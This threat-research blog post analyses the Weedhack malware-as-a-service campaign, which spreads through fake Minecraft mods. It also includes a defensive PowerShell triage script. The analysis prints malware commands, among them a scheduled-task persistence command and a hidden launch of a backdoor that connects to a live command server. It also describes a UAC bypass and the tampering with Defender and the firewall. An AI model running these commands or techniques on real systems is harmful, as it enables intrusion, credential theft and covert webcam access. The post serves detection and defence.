Authored by Aayush Tyagi
Introduction
Minecraft is a 2011 sandbox game developed and published by Mojang Studios. It is the best-selling video game in the world and has sold over 350 million copies worldwide. Its popularity has spanned over a decade thanks to its versatile gameplay, which offers multiple game modes, including one of the most memorable Story Modes in gaming history.
It allows players to create and host multiplayer servers with a variety of gameplay options and offers a wide range of custom launchers, game mods, and cheats to choose from.
Its massive popularity and widespread use of third-party tools have also given rise to a dark side of the Minecraft ecosystem, which is filled with Remote Access Trojans (RATs), credential stealers, keyloggers and other malware threats.
McAfee Labs has recently uncovered a colossal Minecraft-focused Malware-as-a-Service (MaaS) campaign named ‘Weedhack’, which allows threat actors to remotely access and manipulate the victims’ screen, webcam and file system through a dashboard hosted on the clear net, making it easily accessible to anyone with a Discord account and an internet connection.
Key Findings
- ‘Weedhack’ has been active since January 2026 and masquerades as genuine Minecraft clients and mods to infect users.
- We’ve discovered over 3,820 unique malicious JAR files that are part of this attack and over 240 URLs responsible for distributing this malware.
- This campaign utilizes SEO poisoning and YouTube to generate traffic to these malicious URLs. We also found two YouTube channels and multiple videos that demonstrate Minecraft mods and clients and redirect viewers to these URLs.
- The campaign has accumulated a total of 116,464 hits, averaging approximately 2,000 to 3,000 hits per day.
- The campaign provides an enterprise-grade dashboard that allows customers to view stolen credentials and system information, download the payload, configure notifications, access tutorials, and remotely monitor their victims.
- This campaign deploys EtherHiding, a technique that uses Ethereum blockchain to fetch its latest C2 domain. The responses are RSA-signed and verified before execution, helping protect the network from campaign takeover attempts.
- We’ve uncovered 10 domains that host the next stage payloads and host the malware dashboard for the Weedhack campaign.
- We’ve identified 11 domains that hosted similar MaaS campaigns in the past, orchestrated by the same threat actor.
- We’ve unearthed the threat actor’s Telegram account and uncovered a Telegram channel for customers, with over 850 members, as of writing this blog.
- This campaign offers two service tiers: free and premium.
- The free tier includes a comprehensive infostealer capable of targeting Minecraft session IDs and four Minecraft launchers, collecting system information, and stealing cookies and passwords from 36 different browsers. It also targets 56 browser-based crypto wallets and 12 desktop crypto wallets, along with Discord, Steam, and Telegram credentials. It can search for files using 24 different keywords and includes screenshot capture capabilities.
- For premium users, with subscriptions starting at $5 per month, it offers additional remote-access capabilities such as webcam access, keylogging, reverse shell execution, screen sharing with keyboard and mouse access, and file management features for uploading and downloading files.
- While monitoring the Telegram channel, we found that WeedHack malware is a major catalyst for cyberbullying. Many of its customers appear to be teenagers and young adults who use the remote access capabilities to threaten, harass and monitor victims of around the same age.
Attack Vector

The Weedhack campaign primarily relies on YouTube-driven distribution and SEO poisoning to infect its victims. Its dashboard provides a tutorial on both methods to educate customers on how to implement them effectively, covering optimization techniques, target selection, and common pitfalls and how to avoid them.
YouTube Spreading
Weedhack considers YouTube one of the best platforms for spreading malware. They recommend that customers create well-edited videos, with overlays and background music, and avoid AI-generated content, claiming that high-quality videos can generate consistent traffic for months.

These videos target specific Minecraft keywords and place download links in both the description and the comment section for more visibility (Figure 2, highlighted in red).

Threat actors also actively try to manipulate their victims: we identified comments claiming that the downloaded files are legitimate software and not malicious (Figure 3, highlighted in green).

In this second example, the video provides a tutorial for a Minecraft mod. Here, a voice-over narration is added to the video to make the video appear more legitimate. It has gained over 7,500 views (highlighted in red) and has a link to the malicious website in the description (highlighted in green).
SEO poisoning
Weedhack targets Minecraft clients and mods that have no official website and are hosted exclusively on file-hosting sites like GitHub, specifically selecting mods with unique names so that it is easier to dominate search engine results.
They’ve actively targeted the following Minecraft clients:
Meteor Client, Radium Client, Wurst Client, Aristois, LiquidBounce, Impact Client, Future Client, Inertia Client, Cornos Client, WWE Client, 3arthh4ck, Salhack, Phobos, Gamesense

They recommend customers participate in Discord and Reddit discussions to promote their website, without directly associating with it, to maintain legitimacy. These methods redirect users to genuine-looking websites that are used to distribute Weedhack.

In the above instance (Figure 6), the threat actor is hosting his website on the ‘lovable.app’ platform. The site offers eight Minecraft tools, such as Radium Client and Dupe Mod, and all of them are malicious.
Similarly, we encountered another website (Figure 7) offering an item duplicator game mod, which is also spreading Weedhack malware.

Figure 7: Malicious website hosting Weedhack – Example 2
In the final example (Figure 8), this website has included a Security Warning (highlighted in red), stating that users should only download ‘Skytils’ from their site, claiming it is the official website and that no other websites are affiliated with the project. It also links to the official ‘Skytils’ Discord server and GitHub repository under the community section to appear trustworthy. In reality, it is another website that distributes WeedHack.

Geographical Prevalence

McAfee has observed that Weedhack is most prevalent in the United States, followed by Germany, India, the United Kingdom, Italy, Vietnam, Canada, Norway, Sweden, Finland and Spain.
Why Does It Matter and Am I Protected?
One of the key features that makes Weedhack unique is that it is hosted on the clear net and provides access to sophisticated malware for free. Typically, Malware-as-a-Service offerings such as Lumma Stealer range from $250 to $500 per month and are accessible only through underground channels, such as the dark web and Telegram channels. Similarly, XWorm samples cost between $300 and $500 for a lifetime subscription. Weedhack, on the other hand, offers the malware for free, with premium features starting at $5 per month and $24.99 for lifetime access.
This difference in cost and ease of access, combined with detailed tutorials on how to use the malware, significantly reduces the barrier to entry for prospective customers. Furthermore, its ability to steal Minecraft accounts attracts a younger audience. These two factors complement each other and make the campaign much more dangerous.
Another unforeseen and unfortunate consequence of this campaign is that it facilitated cyberbullying. We encountered multiple instances where the threat actors reached out to their victims to threaten and harass them. They recorded victims via their webcams and shared the videos on the Telegram channel as cybercrime trophies.
At McAfee Labs, we have been actively hunting for such malware campaigns, so you don’t need to worry. But it always helps to be informed and educated about the latest threats in the threat landscape and how to protect yourself and your loved ones against them.
| Step | User Experience | Behind the Scenes | Red Flags | How McAfee Helps |
| --- | --- | --- | --- | --- |
| 1) | The video reviews a Minecraft client/mod and provides a link to download it for free. | Such videos are posted by threat actors to trap potential victims. | 1. The video was posted recently. 2. The video was uploaded by a channel that only posts similar content. | McAfee’s Web Protection helps block malicious sites. |
| 2) You discovered a website offering Minecraft mods/clients. | The website seems genuine, as it is well crafted and beautiful. | It’s easier to create such websites now, due to the advancements in AI models. | The Minecraft tool is not hosted on the official website. | McAfee’s Web Protection helps block malicious sites. |
| 3) You download a Minecraft client, and it gets detected by your AV product. | The website mentions that AV products sometimes make mistakes, and that you should disable your AV product to use the client. | The threat actors manipulate users into executing malware that is already known and detected by security solutions. | 1. The Minecraft tool is not hosted on the official website. 2. The website does not explain why their tool is being mistaken for malware. | McAfee’s Threat Explainer informs us why a certain file is being detected. |
| 4) You or someone you know has been contacted by a hacker claiming to have hacked your system. | Threat actors claim to know your IP address and show evidence that they have access to your webcam or to your system. | Threat actors reach out to their victims to harass and bully them. | Reach out to someone you trust, such as a parent or guardian, and inform them about the incident. Following the attacker’s instructions could lead to more damage. | |
Malware Dashboard

The dashboard is currently hosted on ‘hxxps://weedhack.to/dashboard/auth/login’. We identified 10 URLs that are part of this campaign and hosted the dashboard earlier. As older URLs are getting detected, threat actors are actively deploying new domains.
The dashboard allows users to view their statistics, total hits, and session hits. Every hit contains system information, such as CPU, GPU, RAM, OS, IP address, user and PC name, along with a screenshot of the victim’s screen and the malware’s execution environment. Within this section, it provides access to all stolen credentials exported from a victim’s PC.
Session hits, on the other hand, only include Minecraft session IDs, used for Minecraft account hijacking.

Weedhack maintains a leaderboard for its customers with All-Time hits and 24-hour hits. Total campaign hits have reached over 116,464, and the leaderboard is refreshed every 10 minutes.

Weedhack includes a Build section that allows customers to create custom payloads that can target Minecraft versions 1.21.0 to 1.21.11. This section also allows customers to inject the malware into legitimate Minecraft mods, tricking users into believing the mod is functioning as expected.

Customers get access to an elaborate tutorial section on the dashboard that covers a wide range of topics, such as:
- How to use the Dashboard.
- How to use the Remote Access Section.
- How to use the stolen Discord Tokens, Cookies and crypto wallet credentials.
- Recommendations for VPN and residential proxy services with setup instructions.
- OPSEC Guidelines
- Tutorial on Malware distribution techniques, such as SEO Poisoning and YouTube Spreading.
- An FAQ section that covers common queries and provides basic troubleshooting guidance.

Weedhack also offers a Suggestion section, where customers can submit feature requests or vote on current suggestions. The current leading suggestions on the platform include:
- Jump scare functionality
- Adding ransomware
- Microphone access
- Support for more Minecraft clients

Weedhack offers 4 payment options. They accept payments in Bitcoin and Litecoin. For every new payment, a new crypto wallet is created, so it is difficult to track wallet IDs associated with the campaign.

They provide an extensive side-by-side comparison of the free and premium features.
After purchasing the premium subscription, customers get access to the Remote section, where they can use features such as webcam access, keylogging, reverse shell, and other remote-access capabilities.

Additionally, the campaign has a settings tab that allows users to configure Telegram and Discord notifications for new hits, as well as anti-spam controls, where they can disable notifications based on IP addresses, usernames, UUIDs and other criteria.

Weedhack has moved away from Discord as a communication platform and uses Telegram exclusively for communication.

This channel is used for broadcasting updates regarding the Weedhack campaign. It allows customers to directly reach out to the threat actor, in case they encounter any serious issues. Weedhack has attracted significant attention due to its high infection counts.

This popularity caught the eye of the threat actor himself, who posted a screenshot of WeedHack appearing in the top 10 malware families on the Telegram channel (highlighted in red).
While monitoring this channel, we observed that most of the customers are teenagers and that they use this malware to steal Minecraft accounts. They use the channel to post images and videos of themselves harassing their victims as spoils of cybercrime.
Ironically, most of these customers lack real malware development skills. In light of the sensitive nature of the issue, and since most of the victims are underage, we have opted not to share evidence collected from the Telegram channel, in order to protect the privacy of the victims.
The Telegram channel has been taken down, and we are continuing to monitor any new channels that may be established by the threat actors for further communication.
Technical Analysis
Once the victim downloads the infected file from one of these websites, they are presented with a JAR file. Many legitimate Minecraft mods are commonly distributed as JAR files.

These JAR files can be executed directly or loaded via Minecraft.
Stage 1 Payload – DonutDupe.jar

On execution, this JAR relaunches itself via javaw.exe, which, unlike java.exe, does not open a visible console window.

Next, the malware reads the API version from the “fabric.api.json” file located inside the same JAR. This value is unique to each Weedhack customer and is used to identify the threat actor who infected the victim.
Next, the malware decrypts a list of Ethereum JSON-RPC server domains at runtime using a custom string decryption function. These servers act as a bridge between the client and the Ethereum blockchain, allowing the malware to read data stored on-chain without modifying it.

It also decrypts an Ethereum smart contract address, a function identifier, and an embedded RSA public key, using the same decryption function.

This sample contains 32 Ethereum JSON-RPC endpoints, which are then used to query the smart contract. If one endpoint is unavailable or unresponsive, the malware automatically falls back to the next server in the list.
After decoding the contract response, the malware obtains the C2 server address (Figure 26, highlighted in red) with an RSA signature appended.

Once the signature is verified, the malware contacts the C2 server to fetch the Stage 2 payload. This payload is downloaded as raw bytes and is unpacked entirely in memory. The payload is separated into Java class files and resource files, which are loaded directly into memory using a custom Class Loader.

Then, the malware locates the “dev.majanito.Main” class in Stage 2 payload, instantiates it through reflection, and invokes the “initializeWeedhack” method.
Stage 2 Payload – Elevator.jar

From here on out, we observe a change in obfuscation techniques. Stage 2 and the subsequent JAR payloads, namely Stage 3 and Stage 4, are protected using JNIC.
JNIC is a Java native obfuscator that translates compiled Java bytecode into native C code and links that code back to the original Java application using the Java Native Interface (JNI).
At the end of the process, the original bytecode is completely hidden, and a highly obfuscated native DLL is created that contains the execution logic.
This tool also provides a strong string obfuscation feature, which Weedhack also uses to hinder analysis. A JNIC license costs between £150 and £300, and it significantly reduces execution speed for Java applications, as a trade-off for enhanced anti-reversing capabilities.
“dev.majanito.Main” class has a static block (Figure 28, highlighted in red) that executes first. It checks the Windows processor architecture to determine whether the system is x86 or AArch64. Then it decompresses the appropriate native DLL containing the execution logic using a manually implemented LZMA2 decompression routine and drops it in the temp folder.
Then, using JNI’s RegisterNatives function, it maps the Java functions, such as ‘initializeWeedhack’ (Figure 28, highlighted in green), to their native implementations.
Next, the malware performs the UAC bypass by leveraging CMSTP. It creates the following Windows INF installation script in the temp folder and executes it via “cmstp.exe”.

This instruction executes a VBS script (highlighted in red), which silently relaunches the Stage 2 payload via ‘javaw.exe’ with the following parameters.
{"executionEnvironment":"DoubleClick","userId":"9f8f4647-f48d-45f7-acf4-cf8ee5f0bb6f"}
Here, the ‘userId’ value is the same API version from ‘fabric.api.json’ mentioned earlier.
Next, the malware drops and executes ‘WinDefConfig.cmd’ from the temp folder.

This batch script adds 13 path exclusions and 15 process exclusions to Windows Defender, which are later used by the next-stage payloads.
Once the exclusions are added in Windows Defender, the malware executes the following set of commands.

The first set of commands (highlighted in red) is used to collect host information, namely the OS name, CPU and GPU details, and the total RAM.
The next command (highlighted in green) scans and lists nearby Wi-Fi networks, which could allow threat actors to infer the victim’s location and classify the network type. The last command (highlighted in blue) queries Mullvad VPN account information.
Along with this, the sample takes a screenshot of the victim’s screen and steals Discord tokens, browser cookies and passwords using ‘chromedriver.dll’, dropped in the following path.
‘C:\Users\admin\AppData\Roaming\ChromeDriver’
The malware then downloads the SQLite JDBC driver from Apache Maven, creates a database containing all stolen credentials, and sends it to the C2 server. To locate the C2, the malware uses the same Ethereum JSON-RPC technique discussed earlier, with the same set of values.
Afterwards, the malware downloads the Stage 3 payload, ‘SecurityManager.jar’, to the following path
C:\Users\admin\AppData\Roaming\Microsoft\SecurityUpdates\SecurityManager.jar
and executes it via javaw.exe.
Stage 3 Payload – SecurityManager.jar
The Stage 3 payload acts as a stager for the final payload, named ‘Component.jar’.
This JAR creates a Run key registry entry using the following code.

Then it creates a scheduled task entry using this command.
schtasks /Create /TN "JavaSecurityUpdater" /SC ONLOGON /TR "C:\Users\admin\AppData\Roaming\Microsoft\SecurityUpdates\Updater.vbs" /RL HIGHEST /IT /F
This task executes ‘Updater.vbs’ with the highest privileges whenever the user logs in.
Here, Updater.vbs is similar to the elv.vbs script we saw earlier: it runs SecurityManager.jar using javaw.exe.

Next, the malware adds the entire ‘C:\Users’ folder as an exclusion in Windows Defender and downloads the Stage 4 payload to the following path,
C:\Users\admin\AppData\Roaming\Microsoft\SecurityUpdates\component.jar
and executes it via ‘javaw.exe’.
Stage 4 Payload – Component.jar
The stage 4 payload deploys the remote access features of the Weedhack campaign.
RuntimeBroker.exe
The payload drops RuntimeBroker.exe in the following folder
C:\Users\admin\AppData\Roaming
and executes it with the following command.
Start-Process -FilePath 'C:\Users\admin\AppData\Roaming\RuntimeBroker.exe' -ArgumentList '--server wss://remotev2.whpayment.ru/ws/client --user-id 9f8f4647-f48d-45f7-acf4-cf8ee5f0bb6f --debug' -WindowStyle Hidden
Here, this malware operates as a backdoor and connects to the same C2 server as seen previously. This sample is responsible for the remote desktop and webcam access promised by the Weedhack campaign. The user ID has the same value used to identify the actor responsible for infecting the victim, which we’ve seen earlier.
This sample also executes the following commands.

The first three commands (highlighted in red) check whether a firewall rule named ‘Runtime Broker’ already exists, then create two additional rules that allow incoming and outgoing traffic for the same ‘RuntimeBroker.exe’ malware.
Next, the malware creates another scheduled task (highlighted in green) named ‘JMonitoringTask’, which runs the ‘JavaSecurityUpdater’ scheduled task created by the Stage 3 payload every two minutes. This watchdog-style mechanism provides advanced persistence by repeatedly restoring and executing the Stage 4 payload whenever its components are removed or disrupted.
Finally, the last set of commands (highlighted in purple) creates two firewall rules that allow incoming and outgoing traffic for the legitimate ‘javaw.exe’ file. This enables the threat actor to remotely execute Java code through a whitelisted process.
Telemetry.exe
The second payload is dropped in the following folder
C:\Users\admin\AppData\Roaming\Microsoft\Tlmtry
This sample is an infostealer that searches for Telegram and crypto wallet credentials.
It copies itself to the ‘C:\Users\admin\AppData\Roaming’ folder under the name ‘WindowsRunetimeBroker.exe’ and creates a new scheduled task to maintain persistence, using the following command.

This command runs the sample every five minutes and with no execution time limit. The collected data is then transmitted to a separate C2 server, namely ‘telemetrydata.to’.
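As an added triage example (not part of the McAfee analysis), the following PowerShell checks a Windows host for the Stage 2 to Stage 4 artifacts described above: the SecurityUpdates staging folder and dropped binaries, the ‘JavaSecurityUpdater’ and ‘JMonitoringTask’ scheduled tasks, Run key entries, the Windows Defender exclusions, the ‘Runtime Broker’ and javaw.exe firewall rules, and live processes carrying the backdoor’s argument pattern. It assumes the current user’s profile ($env:APPDATA, $env:TEMP) in place of the ‘C:\Users\admin’ paths seen in the analysed sample, and the standard Defender, NetSecurity and ScheduledTasks modules of a current Windows 10/11 host.

```powershell
# Added triage script, not part of the McAfee write-up: inspects a Windows host for the
# persistence and defense-evasion artifacts the analysis attributes to Weedhack Stages 2-4.
# It only reads and reports; it removes nothing. Run it in an elevated session so the
# Defender, firewall and scheduled-task queries succeed. $env:APPDATA and $env:TEMP stand in
# for the 'C:\Users\admin\...' paths of the analysed sample, so run it once per user profile.

$findings = [System.Collections.Generic.List[string]]::new()

# 1. Files and staging folders named in the analysis
$artifactPaths = @(
    (Join-Path $env:APPDATA 'Microsoft\SecurityUpdates\SecurityManager.jar'), # Stage 3
    (Join-Path $env:APPDATA 'Microsoft\SecurityUpdates\component.jar'),       # Stage 4
    (Join-Path $env:APPDATA 'Microsoft\SecurityUpdates\Updater.vbs'),         # logon task target
    (Join-Path $env:APPDATA 'RuntimeBroker.exe'),                             # Stage 4 backdoor
    (Join-Path $env:APPDATA 'WindowsRunetimeBroker.exe'),                     # Telemetry.exe copy
    (Join-Path $env:APPDATA 'Microsoft\Tlmtry'),                              # Telemetry.exe folder
    (Join-Path $env:APPDATA 'ChromeDriver'),                                  # chromedriver.dll
    (Join-Path $env:TEMP    'WinDefConfig.cmd')                               # Defender exclusions
)
foreach ($p in $artifactPaths) {
    if (Test-Path -LiteralPath $p) { $findings.Add("Artifact present: $p") }
}

# 2. Scheduled tasks: 'JavaSecurityUpdater' (ONLOGON, /RL HIGHEST) and the 'JMonitoringTask'
#    watchdog that re-runs it every two minutes
foreach ($name in 'JavaSecurityUpdater', 'JMonitoringTask') {
    $task = Get-ScheduledTask -TaskName $name -ErrorAction SilentlyContinue
    if ($task) {
        $actions = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
        $findings.Add("Scheduled task '$name' ($($task.State)): $actions")
    }
}

# 3. Run-key entries pointing at the staging folder or the dropped backdoor. The analysis
#    reports a Run key but not its value name, so match on the command instead.
foreach ($hive in 'HKCU', 'HKLM') {
    $key = "${hive}:\Software\Microsoft\Windows\CurrentVersion\Run"
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if (-not $props) { continue }
    foreach ($prop in $props.PSObject.Properties) {
        if ($prop.Value -is [string] -and $prop.Value -match 'SecurityUpdates|RuntimeBroker\.exe') {
            $findings.Add("Run key ${key}\$($prop.Name) = $($prop.Value)")
        }
    }
}

# 4. Windows Defender exclusions: the analysis reports C:\Users being excluded wholesale,
#    plus 13 path and 15 process exclusions added by WinDefConfig.cmd (entries not listed)
$mp = Get-MpPreference -ErrorAction SilentlyContinue
if ($mp) {
    foreach ($ex in @($mp.ExclusionPath)) {
        if ($ex -and $ex.TrimEnd('\') -ieq 'C:\Users') { $findings.Add("Defender excludes C:\Users: $ex") }
    }
    foreach ($ex in @($mp.ExclusionProcess)) {
        if ($ex -match 'javaw?\.exe|RuntimeBroker') { $findings.Add("Defender process exclusion: $ex") }
    }
}

# 5. Firewall rules named 'Runtime Broker' or bound to RuntimeBroker.exe / javaw.exe.
#    The legitimate RuntimeBroker.exe lives in System32; the dropped one is under APPDATA.
$appFilters = Get-NetFirewallApplicationFilter -ErrorAction SilentlyContinue |
    Where-Object { $_.Program -match 'RuntimeBroker\.exe|javaw\.exe' }
foreach ($filter in $appFilters) {
    foreach ($rule in ($filter | Get-NetFirewallRule)) {
        $findings.Add("Firewall rule '$($rule.DisplayName)' ($($rule.Direction)/$($rule.Action)) -> $($filter.Program)")
    }
}
foreach ($rule in (Get-NetFirewallRule -DisplayName 'Runtime Broker' -ErrorAction SilentlyContinue)) {
    $findings.Add("Firewall rule named 'Runtime Broker' ($($rule.Direction)/$($rule.Action))")
}

# 6. Live processes: anything started from the staging folder, or carrying the backdoor's
#    '--server wss://... --user-id <uuid>' argument pattern
Get-CimInstance Win32_Process -ErrorAction SilentlyContinue |
    Where-Object { $_.CommandLine -match 'SecurityUpdates\\|--server\s+wss://|--user-id' } |
    ForEach-Object { $findings.Add("Process $($_.ProcessId) ($($_.Name)): $($_.CommandLine)") }

if ($findings.Count -eq 0) { 'No Weedhack Stage 2-4 artifacts found for this profile.' }
else { $findings | ForEach-Object { Write-Warning $_ } }
```

A hit on the ‘JMonitoringTask’ watchdog means removing single files will not hold; disable both scheduled tasks and the Run key entry before deleting the staging folder and the Defender exclusions.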
Indicators of Compromise
McAfee has extensive coverage for the Weedhack malware campaign. We’re proactively covering new samples observed in the wild.
- Trojan:Win/Weedhack.AA
- Trojan:Win/Weedhack.AB
- Trojan:Win/Weedhack.AC
- Trojan:Win/Weedhack.AD
- Trojan:Win/Weedhack.AE
- Trojan:Script/Weedhack.AF